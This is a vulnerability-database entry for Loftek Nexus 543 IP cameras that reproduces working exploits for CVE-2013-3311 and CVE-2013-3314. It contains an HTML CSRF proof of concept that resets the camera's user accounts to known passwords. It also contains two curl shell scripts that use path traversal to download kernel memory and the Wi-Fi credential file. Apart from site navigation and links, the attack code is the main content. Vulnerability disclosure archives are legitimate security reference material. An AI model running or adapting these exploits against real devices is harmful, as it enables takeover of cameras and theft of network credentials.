Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 22 Views

Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities including CSRF and Memory Dum

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Loftek Nexus 543 IP Cameras CSRF Vulnerability
27 Aug 201300:00
zdt
CVE		CVE-2013-3311
21 Nov 201919:39
cve
CVE		CVE-2013-3314
21 Nov 201919:39
cve
Cvelist		CVE-2013-3311
21 Nov 201919:39
cvelist
Cvelist		CVE-2013-3314
21 Nov 201919:39
cvelist
Exploit DB		Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities
26 Aug 201300:00
exploitdb
EUVD		EUVD-2013-3247
7 Oct 202500:30
euvd
exploitpack		Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities
26 Aug 201300:00
exploitpack
NVD		CVE-2013-3311
21 Nov 201920:15
nvd
NVD		CVE-2013-3314
21 Nov 201920:15
nvd
Rows per page

                                                CSRF:

<HTML><TITLE>Loftek Nexus 543 CSRF PoC</TITLE>
<IMG SRC="http://ip-camera-address/set_users.cgi?next_url=rebootme.htm&user1=admin&pwd1=password&pri1=2&user2=anon&pwd2=password&pri2=0&user3=&pwd3=&pri3=1&user4=&pwd4=&pri4=0&user5=&pwd5=&pri5=0&user6=&pwd6=&pri6=0&user7=&pwd7=&pri7=0&user8=&pwd8=&pri8=0" ALT="Your password has been reset to admin/password">
</HTML>


Memory Dump:

#!/bin/sh
# This script exploits CVE-2013-3311 to retrieve kernel memory from a Loftek Nexus 543 IP camera
# The file which is downloaded can be analyzed (strings) to recover passwords and other goodies


if [[ "$1x" != "x" && "$2x" != "x" ]]; then
	curl http://$1/../proc/kcore -o $2 
	exit
fi
echo "Usage: $0 Nexus-543-IP output_file" 

WiFi Creds:


#!/bin/sh
# This script exploits CVE-2013-3314 to retrieve wifi credentials from a Loftek Nexus 543 IP camera

if [ "$1x" != "x" ]; then
	curl http://$1/../etc/RT2870STA.dat
	exit
fi
echo "Usage: $0 Nexus-543-IP"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.5High risk
Vulners AI Score7.5
EPSS0.24633
loftek nexus 543ip camerasmultiple vulnerabilitiescsrfmemory dumpwifi credscve-2013-3311cve-2013-3314kernel memorypasswordsrt2870sta.dat
22